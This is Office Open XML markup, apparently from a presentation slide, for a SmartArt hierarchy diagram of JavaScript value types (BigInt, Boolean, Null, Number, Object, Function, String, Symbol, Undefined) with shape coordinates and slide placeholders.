    <dgm:cxn modelId="{4AF4DA29-BA4F-4C30-8258-D4311D56747C}" type="presParOf" srcId="{C8C1CDD6-1B79-497F-8793-39348C778F4D}" destId="{30728891-0023-4FFF-81E1-3FD2A3D1F60E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{40447CC6-79A8-4861-B9C9-FF2DDF5C2683}" type="presParOf" srcId="{30728891-0023-4FFF-81E1-3FD2A3D1F60E}" destId="{C8D26016-2195-41CE-9055-E36E43CBCFD6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{1A4F9693-0E1F-4060-8DB1-14911645A741}" type="presParOf" srcId="{30728891-0023-4FFF-81E1-3FD2A3D1F60E}" destId="{A2E02132-56C9-446C-8155-E58BC96E17FC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{EBE0B94E-86EC-43D1-BF06-AE2973775884}" type="presParOf" srcId="{C8C1CDD6-1B79-497F-8793-39348C778F4D}" destId="{8089430F-C7C9-4655-AC5E-70861CA95179}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D64C6A10-B102-4150-88C4-1A13644E8118}" type="presParOf" srcId="{C4D5867A-0BEC-4EEE-95D5-82DF1682B680}" destId="{D3785224-E212-47E2-BA72-DB30080A4CFC}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{6C1E7452-89E0-4BF7-AB49-DD353C299FAD}" type="presParOf" srcId="{C4D5867A-0BEC-4EEE-95D5-82DF1682B680}" destId="{706D314E-61B0-433B-93C4-2232C6936EA7}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E7F37A73-DF82-4523-9394-24CE89A3AC7A}" type="presParOf" srcId="{706D314E-61B0-433B-93C4-2232C6936EA7}" destId="{DD78CEDB-4814-48A5-91DC-5527034D65A1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B130597D-A5F1-4D9F-B856-AB9982B7724D}" type="presParOf" srcId="{DD78CEDB-4814-48A5-91DC-5527034D65A1}" destId="{441A92AB-9EAA-41FD-AE98-6F485F81988D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E2850116-DB46-455D-885C-B1CBA423F932}" type="presParOf" srcId="{DD78CEDB-4814-48A5-91DC-5527034D65A1}" destId="{1C66FF4D-3F28-47A1-90EF-BDEB894CBE16}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{056F2E60-C16A-492C-8B55-B79825188516}" type="presParOf" srcId="{706D314E-61B0-433B-93C4-2232C6936EA7}" destId="{8A2FAE22-4CEA-4C4C-8DCF-D659870EEB3F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{CC10ED1E-1500-4680-86BF-5211E65EFC49}" type="presParOf" srcId="{8A2FAE22-4CEA-4C4C-8DCF-D659870EEB3F}" destId="{942257A4-2037-439B-B3FE-E5D626DDBB99}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{CE5BDE86-CBA8-4B7C-BBE5-61B86F14EBFC}" type="presParOf" srcId="{8A2FAE22-4CEA-4C4C-8DCF-D659870EEB3F}" destId="{1F9CFC17-FB02-4E04-8C15-0BA65C4DF2D3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{228B9B93-F33D-4A3A-9C03-57F8F3CDD35A}" type="presParOf" srcId="{1F9CFC17-FB02-4E04-8C15-0BA65C4DF2D3}" destId="{EE7CC561-409A-4555-B583-FCC3E6FE9510}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{42E90228-0F4F-4268-ABDC-3247A7D309D6}" type="presParOf" srcId="{EE7CC561-409A-4555-B583-FCC3E6FE9510}" destId="{C799EB64-FE67-4460-AC85-FC033ED7B61E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F4DFED57-92C6-4833-8A81-3BABA1C0466E}" type="presParOf" srcId="{EE7CC561-409A-4555-B583-FCC3E6FE9510}" destId="{728192B3-06BA-48CD-BA87-FEF4312EFAFA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{513261CC-C5EE-451C-AAB0-9AF40135B2EA}" type="presParOf" srcId="{1F9CFC17-FB02-4E04-8C15-0BA65C4DF2D3}" destId="{C76F75C9-2B76-4A53-B408-EACBBBB36E0F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{C23FDFFD-0BBA-4227-8CBA-BB3F0A0499DE}" type="presParOf" srcId="{C4D5867A-0BEC-4EEE-95D5-82DF1682B680}" destId="{D15446B3-A16A-4D1F-8319-0F3662FD78C6}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{ED1E231C-584C-4430-AFF5-EF7E1C48AEF7}" type="presParOf" srcId="{C4D5867A-0BEC-4EEE-95D5-82DF1682B680}" destId="{AF376C23-9DA8-4C18-B961-EE8B726D178C}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{683FD95E-6AA6-4D7E-A2DC-EF131E5D4514}" type="presParOf" srcId="{AF376C23-9DA8-4C18-B961-EE8B726D178C}" destId="{67B0DDA3-58DE-46D0-9C67-04B93814968E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{A1681B25-C849-4167-89C9-AA6810879A64}" type="presParOf" srcId="{67B0DDA3-58DE-46D0-9C67-04B93814968E}" destId="{DE316BFA-47AA-44C2-B552-6D8BFF3D2EF8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{884D5EE0-5DE5-4E96-A113-72377074812F}" type="presParOf" srcId="{67B0DDA3-58DE-46D0-9C67-04B93814968E}" destId="{D2CB75B2-1996-40D1-A9D8-4C770D4112F9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{55EDB38C-DAA0-4D29-B768-82B9EF2EC735}" type="presParOf" srcId="{AF376C23-9DA8-4C18-B961-EE8B726D178C}" destId="{5062A93C-09A0-4DAA-BF93-9E31684EE3F4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F5464E4A-7477-4194-8887-B422092E4DDB}" type="presParOf" srcId="{C4D5867A-0BEC-4EEE-95D5-82DF1682B680}" destId="{7684E9B6-1342-456C-9A77-54751094EDBF}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DBDA2FA2-7454-403C-991D-3A6C7038B189}" type="presParOf" srcId="{C4D5867A-0BEC-4EEE-95D5-82DF1682B680}" destId="{10D232A1-F2C7-4051-B496-BBE5F27F0DD8}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{409642A0-DFF5-4BFC-A0AD-2D2AF0436532}" type="presParOf" srcId="{10D232A1-F2C7-4051-B496-BBE5F27F0DD8}" destId="{AEB24F20-801F-4388-A1B5-ACD405B50AA9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{55B45F3A-BDFF-4BC2-9D51-30B5CD20A7CA}" type="presParOf" srcId="{AEB24F20-801F-4388-A1B5-ACD405B50AA9}" destId="{2E4CD88A-8373-4099-A1B8-53121450AB96}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9B9B9116-33F6-4F44-975B-DA08A9712D52}" type="presParOf" srcId="{AEB24F20-801F-4388-A1B5-ACD405B50AA9}" destId="{D24DDFB4-DFDC-420A-B30F-F3FE298E6F71}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{8D71AE84-BB75-47B2-B237-8067EF16B75C}" type="presParOf" srcId="{10D232A1-F2C7-4051-B496-BBE5F27F0DD8}" destId="{E11605AD-D073-4117-A1A9-D5F7F7606216}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{6E54475D-1EFD-43E5-A5D5-96DDAA84B2E7}" type="presParOf" srcId="{C4D5867A-0BEC-4EEE-95D5-82DF1682B680}" destId="{87B4A001-15F4-4B7D-B973-2538B513F3D5}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{0265E5BD-ACAD-4BD8-950A-C3CEF865AAD0}" type="presParOf" srcId="{C4D5867A-0BEC-4EEE-95D5-82DF1682B680}" destId="{D6180ADA-6848-4D65-AAFF-99422B63A1FF}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B29F85B7-F24E-46FB-8CCC-BA197771A255}" type="presParOf" srcId="{D6180ADA-6848-4D65-AAFF-99422B63A1FF}" destId="{0C395D09-5A15-4EC5-9502-56D355AA7D1E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{FAE8CD00-C8A8-4913-9CFA-36578B52CB49}" type="presParOf" srcId="{0C395D09-5A15-4EC5-9502-56D355AA7D1E}" destId="{BF8240EF-72B8-4E2F-9F58-4C2AA9CB4EB4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{589B6910-B8A4-4ADA-AAA9-7BAECB60D27F}" type="presParOf" srcId="{0C395D09-5A15-4EC5-9502-56D355AA7D1E}" destId="{3CC34F85-0A99-4621-992F-2571BBF086A2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{1B7A1E58-D22E-4AA2-B1AF-A58CAFC40053}" type="presParOf" srcId="{D6180ADA-6848-4D65-AAFF-99422B63A1FF}" destId="{418E897D-E744-477E-9826-F8BAB1A645E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A001-15F4-4B7D-B973-2538B513F3D5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4272964" y="677756"/>
          <a:ext cx="3823290" cy="259934"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="3823290" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="382329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84E9B6-1342-456C-9A77-54751094EDBF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4272964" y="677756"/>
          <a:ext cx="2730921" cy="259934"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2730921" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2730921"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5446B3-A16A-4D1F-8319-0F3662FD78C6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4272964" y="677756"/>
          <a:ext cx="1638552" cy="259934"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1638552" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1638552"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2257A4-2037-439B-B3FE-E5D626DDBB99}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4773429" y="1505226"/>
          <a:ext cx="91440" cy="259934"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="25993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785224-E212-47E2-BA72-DB30080A4CFC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4272964" y="677756"/>
          <a:ext cx="546184" cy="259934"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="546184" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="546184"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5D23C6-45B9-4208-9B82-4A68F4E9676C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3726780" y="677756"/>
          <a:ext cx="546184" cy="259934"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="546184" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="546184" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="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7A95F7-47F7-4739-BEC6-5F8FFDFF5F69}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2634411" y="677756"/>
          <a:ext cx="1638552" cy="259934"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1638552" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1638552" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="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CE1AED-93F4-4587-BC53-377325572ECE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1542043" y="677756"/>
          <a:ext cx="2730921" cy="259934"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="2730921" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="2730921" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="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4CFB9A-C5D3-4056-B6CD-105690A9E8A7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="449674" y="677756"/>
          <a:ext cx="3823290" cy="259934"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3823290" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="3823290" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="177137"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="2599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5668BA-795D-46D6-8363-0B987FF0AF51}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3826086" y="110221"/>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41C7F2-E440-45A6-9869-A1A913859B5A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3925393" y="204562"/>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(Top type: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-HK" sz="1300" kern="1200" dirty="0" err="1"/>
            <a:t>blobcat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-HK" sz="1300" kern="1200" dirty="0"/>
            <a:t>)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3942016" y="221185"/>
        <a:ext cx="860510" cy="534289"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B2B8023-46E0-4956-8823-5719E3E346CE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2796"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80C2F-6A6A-4F2C-9226-A28A8F3AB6B1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="102102"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err="1"/>
            <a:t>BigInt</a:t>
          </a:r>
          <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="118725" y="1048654"/>
        <a:ext cx="860510" cy="534289"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{11C75E19-CC71-4D58-AB79-B5DDB3FBBA46}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1095165"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534F23-3376-4A23-9A7A-7669E4DC7FC4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1194471"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Boolean</a:t>
          </a:r>
          <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1211094" y="1048654"/>
        <a:ext cx="860510" cy="534289"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3CFA5414-62C4-4197-AEED-ECBC903BEC12}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2187533"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1FE9D6-043A-4D9F-8306-977BBB70FD9A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2286840"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Null</a:t>
          </a:r>
          <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2303463" y="1048654"/>
        <a:ext cx="860510" cy="534289"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C8D26016-2195-41CE-9055-E36E43CBCFD6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3279902"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E02132-56C9-446C-8155-E58BC96E17FC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3379208"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Number</a:t>
          </a:r>
          <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3395831" y="1048654"/>
        <a:ext cx="860510" cy="534289"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{441A92AB-9EAA-41FD-AE98-6F485F81988D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4372271"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66FF4D-3F28-47A1-90EF-BDEB894CBE16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4471577"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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t>Object</a:t>
          </a:r>
          <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1300" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:highlight>
              <a:srgbClr val="FFFF00"/>
            </a:highlight>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4488200" y="1048654"/>
        <a:ext cx="860510" cy="534289"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C799EB64-FE67-4460-AC85-FC033ED7B61E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4372271" y="176516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8192B3-06BA-48CD-BA87-FEF4312EFAFA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4471577" y="185950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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t>Function</a:t>
          </a:r>
          <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1300" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:highlight>
              <a:srgbClr val="FFFF00"/>
            </a:highlight>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4488200" y="1876124"/>
        <a:ext cx="860510" cy="534289"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DE316BFA-47AA-44C2-B552-6D8BFF3D2EF8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5464639"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CB75B2-1996-40D1-A9D8-4C770D4112F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5563945"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String</a:t>
          </a:r>
          <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5580568" y="1048654"/>
        <a:ext cx="860510" cy="534289"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2E4CD88A-8373-4099-A1B8-53121450AB96}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6557008"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4DDFB4-DFDC-420A-B30F-F3FE298E6F71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6656314"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Symbol</a:t>
          </a:r>
          <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6672937" y="1048654"/>
        <a:ext cx="860510" cy="534289"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BF8240EF-72B8-4E2F-9F58-4C2AA9CB4EB4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7649376" y="937690"/>
          <a:ext cx="893756" cy="56753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C34F85-0A99-4621-992F-2571BBF086A2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7748683" y="1032031"/>
          <a:ext cx="893756" cy="56753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HK" sz="1300" kern="1200" dirty="0"/>
            <a:t>Undefined</a:t>
          </a:r>
          <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7765306" y="1048654"/>
        <a:ext cx="860510" cy="5342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5FB41F-E580-1435-7785-4FB26E6088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Date Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F802874-9C3C-6846-B57F-F3C2188C59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87E698-C536-44BF-B541-14E965FFE31E}" type="datetimeFigureOut">
              <a:rPr lang="zh-HK" altLang="en-US" smtClean="0"/>
              <a:t>6/5/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-HK" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA6E4710-06CE-2360-ADD8-BA4BE45FF9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5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9C9B9C8-7213-C7E5-BCEB-078B56F791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9F60A1-94C1-45A7-8F42-C461A34A149F}" type="slidenum">
              <a:rPr lang="zh-HK" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-HK" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17650568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need learn linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
